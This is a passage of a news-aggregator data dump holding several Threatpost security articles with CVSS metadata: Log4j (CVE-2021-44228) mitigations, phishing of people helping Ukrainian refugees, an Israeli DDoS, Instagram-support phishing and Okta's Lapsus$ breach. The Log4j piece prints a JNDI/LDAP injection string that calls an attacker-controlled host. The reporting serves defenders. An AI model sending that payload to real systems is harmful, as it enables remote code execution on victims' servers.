\u201cJndi:ldap\u201d \u2013 they could be affected.\n\n\u201cIf you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,\u201d cybersecurity researchers at Randori [wrote in a blog post](<https://www.randori.com/blog/cve-2021-44228/>).\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted that a workaround released to address the flaw, which comes as part of Log4j version 2.15.0; reportedly changes a system setting from \u201cfalse\u201d to \u201ctrue\u201d by default.\n\nDon\u2019t change that, he warned: users who change the setting back to \u201cfalse\u201d remain vulnerable to attack, and as a result, \u201cit is highly recommended that this is not returned to its previous setting.,\u201d he told Threatpost on Friday. \u201cGiven the scale of affected devices and exploitability of the bug, it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors. Organizations are advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications.\u201d\n\n## Temporary Mitigation\n\nTo keep the library from being exploited, it\u2019s urgently recommended that Log4j versions are [upgraded](<https://logging.apache.org/log4j/2.x/security.html>) to log4j-2.15.0-rc1.\n\nBut for those who can\u2019t update straight off, LunaSec pointed to a [ discussion on HackerNews](<https://news.ycombinator.com/item?id=29507263>) regarding a mitigation strategy available in version 2.10.0 and higher of Log4j that was posted in the early hours of Friday morning.\n\nFor versions older than 2.10.0 that can\u2019t be upgraded, these mitigation choices have been suggested:\n\n * Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files ([here are Apache\u2019s details](<https://issues.apache.org/jira/browse/LOG4J2-2109>)); or,\n * Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application\u2019s or stack\u2019s classloading documentation to understand this behavior; or\n * Users should switch log4j2.formatMsgNoLookups to true by adding:\u201d\u2010Dlog4j2.formatMsgNoLookups=True\u201d to the JVM command for starting the application.\n\n## How the Vulnerability Works\n\nThe Huntress ThreatOps team has published [details](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>) on the vulnerability\u2019s impact and advice on what organizations should do next. Expect it and other reports to be updated as the situation unfolds.\n\nHuntress researchers said that the attack vector is \u201cextremely trivial\u201d for threat actors. As has been noted, it takes just a single text string to trigger an application to reach out to an external location if it\u2019s logged via the vulnerable instance of log4j.\n\nAs Hammond told Threatpost, a possible exploit could entail a threat actor supplying special text in an HTTP User-Agent header or a simple POST form request, with the usual form:\n\n${jndi:ldap://maliciousexternalhost.com/resource\n\n\u2026where maliciousexternalhost.com is an instance controlled by the adversary.\n\nThe log4j vulnerability parses the input and reaches out to the malicious host via the JNDI. \u201cThe first-stage resource acts as a springboard to another attacker-controlled endpoint, which serves Java code to be executed on the original victim,\u201d according to Huntress. \u201cUltimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution.\u201d\n\n## Stop, Drop, Hunt It Down\n\nSo much for baking Christmas cookies: It\u2019s going to be a long weekend for a lot of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it \u201ca worst-case scenario.\u201d\n\n\u201cThe combination of log4j\u2019s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult, and the fact that the exploit itself fits into a tweet,\u201d he told Threatpost on Friday via email.\n\nFirst things first, he said, \u201cstop what you\u2019re doing as a software shop and enumerate where log4j exists and might exist in your environment and products.\u201d\n\nHe noted that it\u2019s the kind of software \u201cthat can quite easily be there without making its presence obvious, so we expect the tail of exploitability on this vulnerability to be quite long.\u201d\n\nTim Wade, technical director of the CTO team at Vectra, told Threatpost that the specifics of how attacks will play out are \u201cstill a bit open-ended.\u201d But given the widespread use and position of the underlying software, he said, \u201cit absolutely looks like a good candidate for malicious network ingress, which means network defenders should be on guard for suspicious outbound traffic that may indicate command-and-control.\u201d\n\nWade said this is an example of how critical effective detection and response capabilities are, and \u201creally exposes how risky the \u2018prevent, patch, and pray\u2019 strategy that\u2019s so widely adopted in legacy security programs really is.\u201d\n\nJohn Bambenek, principal threat hunter at Netenrich, said that mitigations should be applied ASAP, including updating Java. He told Threatpost that Web application firewalls should also be updated with an appropriate rule to block such attacks.\n\n121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and Casey Ellis.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T17:58:04", "type": "threatpost", "title": "Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T17:58:04", "id": "THREATPOST:D098942E4435832E619282E1B92C9E0F", "href": "https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T17:21:25", "description": "Cyberattackers used a compromised Ukrainian military email address to phish EU government employees who\u2019ve been involved in managing the logistics of refugees fleeing Ukraine, according to a new [report](<https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails>).\n\nUkraine has been at the center of an unprecedented wave of cyberattacks in recent weeks and months, from distributed denial-of-service (DDoS) [campaigns](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against organizations and citizens to attacks against national [infrastructure](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) and more. This time, attackers went after aides in the EU, leveraging breaking news in the Russian invasion of Ukraine to entice targets into opening emails containing Microsoft Excel files laced with malware.\n\nResearchers attributed the phishing attempt to TA445 (aka UNC1151 or Ghostwriter). TA445 has previously been [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the government of Belarus.\n\n## Attack Coincided with Russia\u2019s Invasion\n\nOn Wednesday, Feb. 23, NATO convened an [emergency meeting](<https://www.nato.int/cps/en/natohq/news_192406.htm>) regarding the impending Russian invasion of Ukraine.\n\nThe following day \u2013 the day Russia invaded Ukraine \u2013 researchers detected a suspicious email making the rounds. Its subject: \u201cIN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022.\u201d It contained a macros-enabled Microsoft Excel (.xls) spreadsheet titled \u201clist of persons.xlsx\u201d that, when opened, delivered malware called SunSeed.\n\nThe email originated from a ukr.net address, which is a Ukrainian military email address. Oddly enough, the researchers were able to trace the address to a publicly available procurement document for a Stihl-brand lawn mower, purchased back in 2016. The order was made by \u201c\u0412\u0456\u0439\u0441\u044c\u043a\u043e\u0432\u0430 \u0447\u0430\u0441\u0442\u0438\u043d\u0430 \u04102622,\u201d a military unit based in Chernihiv, Ukraine. Exactly how the attackers obtained access to a military email address is not clear.\n\nThis phishing targeted a very specific group of European government personnel involved in managing the outflux of refugees from Ukraine. Though the targets \u201cpossessed a range of expertise and professional responsibilities,\u201d the report noted, \u201cthere was a clear preference for targeting individuals with responsibilities related to transportation, financial and budget allocation, administration, and population movement within Europe.\u201d\n\nThe goal in targeting these specific individuals was \u201cto gain intelligence regarding the logistics surrounding the movement of funds, supplies, and people within NATO member countries,\u201d according to the report.\n\n## Attackers Tied to Belarus, Russia by Extension\n\nThe report noted that no \u201cconcrete\u201d evidence can \u201cdefinitively\u201d tie this campaign to a particular threat actor. Still, the researchers noted a bevy of similarities between this phishing campaign and another campaign from July of last year that targeted U.S. cybersecurity and defense companies.\n\nThe July campaign \u201cutilized a highly similar macro-laden XLS attachment to deliver MSI packages that install a Lua malware script,\u201d according to Proofpoint researchers. Lua is the programming language in which SunSeed is coded. \u201cSimilarly, the campaign utilized a very recent government report as the basis of the social engineering content,\u201d they added.\n\nThe file name in that campaign \u2013 \u201clist of participants of the briefing.xls.\u201d \u2013 bears striking resemblance to the one used in this new campaign. Furthermore, \u201cthe Lua script created a nearly identical URI beacon to the SunSeed sample, which was composed of the infected victim\u2019s C Drive partition serial number. Analysis of the cryptography calls in both samples revealed that the same version of WiX 3.11.0.1528 had been utilized to create the MSI packages.\u201d\n\nThese overlaps allowed the researchers to conclude with moderate confidence that the two campaigns were perpetrated by the same threat actor: TA445. [According](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) to Mandiant, the group is based in Minsk, connected to the Belarusian military, and conducts its business in the interests of the Belarusian government. Belarus is a close ally of Russia.\n\nThe researchers concluded with a disclaimer. On balancing \u201cresponsible reporting with the quickest possible disclosure of actionable intelligence,\u201d they wrote, \u201cthe onset of hybrid conflict, including within the cyber domain, has accelerated the pace of operations and reduced the amount of time that defenders have to answer deeper questions around attribution and historical correlation to known nation-state operators.\u201d\n\n## Ukraine\u2019s Unprecedented Cyber Targeting\n\nThis phishing campaign isn\u2019t the worst Ukraine-oriented cyberattack in recent weeks, or even recent days. Still, the researchers noted that \u201cwhile the utilized techniques in this campaign are not groundbreaking individually, if deployed collectively, and during a high tempo conflict, they possess the capability to be quite effective.\u201d\n\nThomas Stoesser, of comforte AG, told Threatpost via email that this attack \u201cshows just how ruthless and clever threat actors can be in adapting existing social engineering tactics.\u201d\n\n\u201cThe situation underscores two key points that every enterprise should heed,\u201d he added. \u201cOne, it\u2019s not enough simply to educate employees sporadically about common social engineering tactics. [Companies] need to put a premium on employees treating every email with healthy skepticism. Two, protect all sensitive enterprise data with more than just perimeter security, even if you feel that the impenetrable vault you\u2019ve stored it all in is foolproof.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T17:18:44", "type": "threatpost", "title": "Phishing Campaign Targeted Those Aiding Ukraine Refugees", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T17:18:44", "id": "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "href": "https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T20:03:19", "description": "Israel\u2019s Nation Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. The incident led to the Directorate to briefly declare a state of emergency, while sources said the [cyberattack was the largest ever against Israel](<https://www.haaretz.com/israel-news/.premium-israeli-government-sites-crash-in-cyberattack-1.10674433>).\n\n\u201cUpdate: In the last few hours, a [DDoS] attack has been identified on a communications provider which, as a result, has for a short time prevented access to a number of sites, including government sites,\u201d the Cyber Israel account tweeted.\n\nHaaretz reported the sites for the Israeli departments of interior, health, justice, welfare and even the Prime Minister\u2019s office were taken offline (services are now restored). A source identified by Haaretz as a member of the \u201cdefense establishment\u201d noted the size of the attack, adding that only a nation-state backed threat actor could have pulled off such a large-scale attack.\n\nInternet tracker NetBlocks reported that the attacks were launched against Israeli telecom providers Bezeq and Cellcom.\n\n> \u2139\ufe0f Update: The [#Israel](<https://twitter.com/hashtag/Israel?src=hash&ref_src=twsrc%5Etfw>) Government Network (Tehila Project, AS8867) which hosts several gov\u00b7il website domains has become unreachable internationally. Users within the country remain able to access the platforms.\n> \n> \ud83d\udcf0 Further Reading: <https://t.co/zgeodgMzk1> [pic.twitter.com/YAHSf63Wun](<https://t.co/YAHSf63Wun>)\n> \n> \u2014 NetBlocks (@netblocks) [March 14, 2022](<https://twitter.com/netblocks/status/1503465330315825152?ref_src=twsrc%5Etfw>)\n\nMeanwhile, cybersecurity watchers and experts suspect Iran was behind the attack.\n\n\u201cThe recent DDoS attacks against Israel have been attributed to actors aligned with Iran, highlighting the significant ongoing tensions between the two countries,\u201d Chris Morgan, senior cyber-threat intelligence analyst with Digital Shadows, told Threatpost by email.\n\nHe said the timing indicates the DDoS attacks were in retaliation for Israel\u2019s attempt to breach Iran\u2019s nuclear infrastructure, Morgan explained.\n\n\u201cThe attacks occurred just hours after Iranian state television announced that its security forces had reportedly stopped an attempted sabotage of nuclear centrifuges against a nuclear power plant in Fordow,\u201d he said. \u201cAttacking nuclear centrifuges draws parallels to previous cyberattacks against Iran, notably the Stuxnet incident of 2010; some have suggested this destructive malware attack was the work of Israel\u2019s intelligence services.\u201d\n\n## **Israel, Uniquely Prepared to Defend Against Cyberattacks **\n\nIsrael is known to have engaged in covert cybersecurity operations across the globe. Jennifer Tisdale, CEO of GRIMM, told Threatpost \u2014 including developing the [Stuxnet worm](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>) that was deployed against Iran. As a result the country is prepared to respond to attacks on its own systems, she said, adding that it\u2019s an approach the U.S. government should adopt.\n\n\u201cToday\u2019s broad cyberattack is just another Tuesday in Israel, for the most part,\u201d Tisdale said. \u201cIsrael\u2019s approach to cybersecurity offers some solid takeaways the U.S. government could and should embrace.\u201d\n\nIt starts with smart government policymaking, she added.\n\n\u201cFirst, Israel has developed cybersecurity public policy that is both robust and nimble,\u201d Tisdale said. \u201cThey have prioritized government funding specific to cyberattack mitigation, preparation and response to protect against other governments or private sector incidents.\u201d\n\nAlso, \u201ccybercriminals also face stiff consequences for their actions against Israeli interests,\u201d Tisdale said.\n\n\u201cIsrael has also embraced an attacker-oriented response strategy and has developed a practice for holding people and organizations accountable with both national and international law enforcement,\u201d she added. \u201cThough we could debate what an appropriate response should look and feel like, I believe we can all agree that having a cyber-response plan and accountability plan to protect U.S. critical infrastructure, government networks and communication systems should be prioritized.\u201d\n\nThough the size of the attack is notable, DDoS attacks in general are common against nations and should be anticipated, Netenrich principal threat hunter John Bambenek told Threatpost.\n\n\u201cUltimately, DDoS attacks remain a technique to knock critical infrastructure, such as government websites, offline,\u201d Bambenek said. \u201cThe technique is popular among activists because it doesn\u2019t require much in the way of prep work to pull off. Government targets, such as the Israeli government, are common.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T19:47:39", "type": "threatpost", "title": "Cyberattacks Against Israeli Government Sites: 'Largest in the Country\u2019s History'", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T19:47:39", "id": "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "href": "https://threatpost.com/cyberattacks-israeli-government-sites-largest/178927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing.****\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. \u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, followed by other organizations along a supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T18:36:10", "description": "On Friday, Okta \u2013 the authentication firm-cum-Lapsus$-victim \u2013 admitted that it \u201cmade a mistake\u201d in handling the [recently revealed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) Lapsus$ attack. \n\nThe mistake: trusting that a service provider had told Okta everything it needed to know about an \u201cunsuccessful\u201d account takeover (ATO) at one of its service providers and that the attackers wouldn\u2019t reach their tentacles back to drag in Okta or its customers. \n\nWrong-o, it turned out: About a week ago, Lapsus$ bragged about having gotten itself \u201csuperuser/admin\u201d access to Okta\u2019s internal systems, gleefully posting proof and poking fun at Okta for its denials that the Jan. 20 attack had been successful. \n\nIn an[ FAQ](<https://support.okta.com/help/s/article/Frequently-Asked-Questions-Regarding-January-2022-Compromise?language=en_US>) published on Friday, Okta offered a full timeline of the incident, which started on Jan. 20 when the company learned that \u201ca new factor was added to a Sitel customer support engineer\u2019s Okta account.\u201d\n\n## What Happened at Sitel \n\nThe target of the Jan. 20 attack was Sykes Enterprises, which Sitel acquired in September 2021. Okta has referred to the company as Sitel \u2013 a third-party vendor that helps Okta out on the customer-support front \u2013 in its updates and FAQ. \n\nThe threat actor failed in its attempt to add a new factor \u2013 a password \u2013 to one of Sitel\u2019s customer support engineer\u2019s Okta account. Okta Security had received an alert that a new factor was added to a Sitel employee\u2019s Okta account from a new location and that the target didn\u2019t accept a multifactor authentication (MFA) challenge, which Okta said blocked the intruder\u2019s access to the Okta account. \n\nNonetheless, \u201cout of an abundance of caution,\u201d the next day \u2013 Jan. 21 \u2013 Okta reset the account and notified Sitel. On the same day, Okta Security shared indicators of compromise (IOC) with Sitel, which told Okta that it had retained outside support from \u201ca leading forensic 